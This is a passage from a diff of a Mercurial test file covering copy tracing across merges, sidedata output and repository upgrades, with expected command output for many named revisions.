h->i->d) - the other way + mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + mFG,Om: chained merges (copy-overwrite -> simple) - same content + mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + 
mGCm-0 merge updated/deleted - revive the file (updated content) - the other way + mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + mGF,Nm: chained merges (copy-overwrite -> simple) - same content + mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mJ,EAm: chained merges (conflict -> simple) - same content everywhere + mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mK,AEm: chained merges (conflict -> simple) - same content everywhere + mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mN,GFm: chained merges (copy-overwrite -> simple) - same content + mO,FGm: chained merges (copy-overwrite -> simple) - same content + mPQ,Tm: chained merges (conflict -> simple) - different content + mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + mQP,Sm: chained merges (conflict -> simple) - different content + mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + mS,QPm: chained merges (conflict -> simple) - different content + mT,PQm: chained merges (conflict -> simple) - different content + n-1: unrelated changes (based on the "f" series of changes) + o-1: unrelated changes (based on "g" changes) 
+ p-1: t -move-> u + p-2: u -move-> v + q-1 r -move-> w + q-2 w -move-> v + r-1: rename r -> x + r-2: rename t -> x + s-1: unrelated changes (based on the "p" series of changes) + t-1: unrelated changes (based on "q" changes) Test that sidedata computations during upgrades are correct @@ -698,9 +1628,10 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no yes no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: * (glob) compression-level: default default default @@ -709,7 +1640,48 @@ requirements preserved: * (glob) - added: exp-copies-sidedata-changeset, exp-sidedata-flag + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag + + processed revlogs: + - all-filelogs + - changelog + - manifest + +#endif + +#if upgraded-parallel + $ cat >> $HGRCPATH << EOF + > [format] + > exp-use-side-data = yes + > exp-use-copies-side-data-changeset = yes + > [experimental] + > worker.repository-upgrade=yes + > [worker] + > enabled=yes + > numcpus=8 + > EOF + $ hg debugformat -v + format-variant repo config default + fncache: yes yes yes + dotencode: yes yes yes + generaldelta: yes yes yes + share-safe: no no no + sparserevlog: yes yes yes + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) 
+ copies-sdc: no yes no + revlog-v2: no yes no + plain-cl-delta: yes yes yes + compression: * (glob) + compression-level: default default default + $ hg debugupgraderepo --run --quiet + upgrade will perform the following actions: + + requirements + preserved: * (glob) + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -721,194 +1693,411 @@ #if no-compatibility no-filelog no-changeset + $ hg debugchangedfiles --compute 0 + added : a, ; + added : b, ; + added : h, ; + added : p, ; + added : q, ; + added : r, ; + $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do - > echo "##### revision $rev #####" + > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'` + > echo "##### revision \"$case_id\" #####" > hg debugsidedata -c -v -- $rev > hg debugchangedfiles $rev > done - ##### revision 0 ##### + ##### revision "i-0 initial commit" ##### 1 sidedata entries - entry-0014 size 34 - '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh' + entry-0014 size 64 + '\x00\x00\x00\x06\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00abhpqr' added : a, ; added : b, ; added : h, ; - ##### revision 1 ##### + added : p, ; + added : q, ; + added : r, ; + ##### revision "i-1" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02acps' removed : a, ; added p1: c, a; - ##### revision 2 ##### + removed : p, ; + added p1: s, p; + ##### revision "i-2" ##### 1 sidedata entries - entry-0014 size 24 - 
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02cdst' removed : c, ; added p1: d, c; - ##### revision 3 ##### + removed : s, ; + added p1: t, s; + ##### revision "a-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00de' removed : d, ; added p1: e, d; - ##### revision 4 ##### + ##### revision "a-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ef' removed : e, ; added p1: f, e; - ##### revision 5 ##### + ##### revision "b-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00b' touched : b, ; - ##### revision 6 ##### + ##### revision "c-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 7 ##### + ##### revision "d-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 8 ##### + ##### revision "d-2 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 9 ##### + ##### revision "e-1 b -move-> g" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bg' removed : b, ; added p1: g, b; - ##### revision 10 ##### + ##### revision "e-2 g -move-> f" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg' added p1: f, g; removed : g, ; - ##### revision 11 ##### + ##### revision "p-1" ##### + 1 sidedata entries + 
entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00tu' + removed : t, ; + added p1: u, t; + ##### revision "p-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv' + removed : u, ; + added p1: v, u; + ##### revision "q-1 r -move-> w" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rw' + removed : r, ; + added p1: w, r; + ##### revision "q-2 w -move-> v" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00vw' + added p1: v, w; + removed : w, ; + ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 12 ##### + ##### revision "mABm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 13 ##### + ##### revision "mBCm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 14 ##### + ##### revision "mBCm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 15 ##### + ##### revision "mCBm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 16 ##### + ##### revision "mCBm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 17 ##### + ##### revision "mBDm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 18 ##### + ##### revision "mDBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 19 ##### + ##### revision "mAEm-0 merge with copies info on both 
side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 20 ##### + ##### revision "mEAm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 21 ##### + ##### revision "mPQm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; + ##### revision "mQPm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; + ##### revision "f-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00hi' removed : h, ; added p1: i, h; - ##### revision 22 ##### + ##### revision "f-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00di' touched p1: d, i; removed : i, ; - ##### revision 23 ##### + ##### revision "mBFm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mFBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 24 ##### + ##### revision "r-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rx' + removed : r, ; + added p1: x, r; + ##### revision "r-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00tx' + touched p1: t, x; + removed : x, ; + ##### revision "mBRm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 25 ##### + ##### revision 
"mRBm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "g-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' touched : d, ; - ##### revision 26 ##### - 1 sidedata entries - entry-0014 size 14 - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' - merged : d, ; - ##### revision 27 ##### + ##### revision "mDGm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 28 ##### + ##### revision "mGDm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 29 ##### + ##### revision "mFGm-0 merge - G side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 30 ##### + ##### revision "mGFm-0 merge - G side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' + merged : d, ; + ##### revision "mCGm-0 merge updated/deleted - revive the file (updated content) - one way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 31 ##### + ##### revision "mGCm-0 merge updated/deleted - revive the file (updated content) - the other way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 32 ##### + ##### revision "mCB-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 33 ##### + ##### revision "mBC-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 
size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 34 ##### + ##### revision "h-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bd' removed : b, ; added p1: d, b; - ##### revision 35 ##### + ##### revision "mCH-delete-before-conflict-m-0 simple merge - C side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mHC-delete-before-conflict-m-0 simple merge - C side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mAE-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; + ##### revision "mEA-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; + ##### revision "mBF-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; + ##### revision "mFB-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; + ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; + ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; + ##### revision "j-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + added : unrelated-j, ; + ##### 
revision "k-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k' + added : unrelated-k, ; + ##### revision "mAE,Km" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mK,AEm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 36 ##### + ##### revision "mEA,Jm" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; + ##### revision "mJ,EAm" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; + ##### revision "s-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-s' + added : unrelated-s, ; + ##### revision "t-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-t' + added : unrelated-t, ; + ##### revision "mPQ,Tm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mT,PQm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mQP,Sm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mS,QPm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "l-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l' + added : unrelated-l, ; + ##### revision "mBC+revert,Lm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mCB+revert,Lm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mL,BC+revertm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mL,CB+revertm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "n-1" 
##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n' + added : unrelated-n, ; + ##### revision "o-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o' + added : unrelated-o, ; + ##### revision "mFG,Om" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mO,FGm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mGF,Nm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mN,GFm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mAE-change,Km" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mK,AE-change-m" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mEA-change,Jm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mJ,EA-change-m" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' @@ -927,7 +2116,10 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' f A f a (no-changeset no-compatibility !) 
@@ -939,21 +2131,21 @@ - unrelated change on the other side $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - o 12 mABm-0 simple merge - the other way + o mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")' @@ -982,12 +2174,18 @@ M b A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBAm")' M b A f a + A t + p R a + R p merging with the side having a delete ------------------------------------- @@ -998,23 +2196,23 @@ and recreate an unrelated file after the merge $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - o 16 mCBm-1 re-add d + o mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r - comparing from the merge @@ -1034,10 +2232,16 @@ R d $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-0")' M b + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' 
--rev 'desc("mCBm-0")' M b + A t + p R a + R p - comparing with the merge children re-adding the file @@ -1060,11 +2264,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-1")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-1")' M b A d + A t + p R a + R p Comparing with a merge re-adding the file afterward --------------------------------------------------- @@ -1074,21 +2284,21 @@ - one deleting and recreating the change $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - o 18 mDBm-0 simple merge - the other way + o mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")' M d @@ -1115,93 +2325,102 @@ $ hg manifest --debug --rev 'desc("d-2")' | grep '644 d' b004912a8510032a0350a74daa2803dadfb00e12 644 d $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' - 169be882533bc917905d46c0c951aa9a1e288dcf 644 d (no-changeset !) - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 d (changeset !) - $ hg debugindex d | head -n 4 + d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) + $ hg debugindex d | head -n 4 | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) 
- 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 2 * 5cce88bf349f ae258f702dfe 000000000000 (changeset !) Log output should not include a merge commit as it did not happen $ hg log -Gfr 'desc("mBDm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ $ hg log -Gfr 'desc("mDBm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBDm-0")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDBm-0")' M b A d + A t + p R a + R p Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - o 20 mEAm-0 simple merge - the other way + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - 
c39c6083dad048d5138618a46f123e2f397f4f18 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - a9a8bc3860c9d8fa5f2f7e6ea8d40498322737fd 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - 263ea25e220aaeb7b9bac551c702037849aa75e8 644 f + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 71b9b7e73d973572ade6dd765477fcee6890e8b1 644 f - $ hg debugindex f + e8825b386367b29fec957283a80bb47b47483fe1 644 f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 263ea25e220a 000000000000 000000000000 - 1 10 71b9b7e73d97 000000000000 000000000000 - 2 19 c39c6083dad0 263ea25e220a 71b9b7e73d97 - 3 20 a9a8bc3860c9 71b9b7e73d97 263ea25e220a + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - 498e8799f49f9da1ca06bb2d6d4accf165c5b572 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - c5b506a7118667a38a9c9348a1f63b679e382f57 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 1e88685f5ddec574a34c70af492f95b6debc8741 644 f - $ hg debugindex f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 b789fdd96dc2 000000000000 000000000000 - 1 10 1e88685f5dde 000000000000 000000000000 - 2 19 498e8799f49f b789fdd96dc2 1e88685f5dde - 3 20 c5b506a71186 1e88685f5dde b789fdd96dc2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * 
d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -1209,20 +2428,20 @@ # based on works fine. We have different output. $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAEm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEAm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAEm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEAm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' A f @@ -1258,15 +2477,24 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm-0")' A f a + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm-0")' A f a (filelog !) b (no-filelog !) + A t + p R a R b - + R p + + +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` Note: | In this case, one of the merge wrongly record a 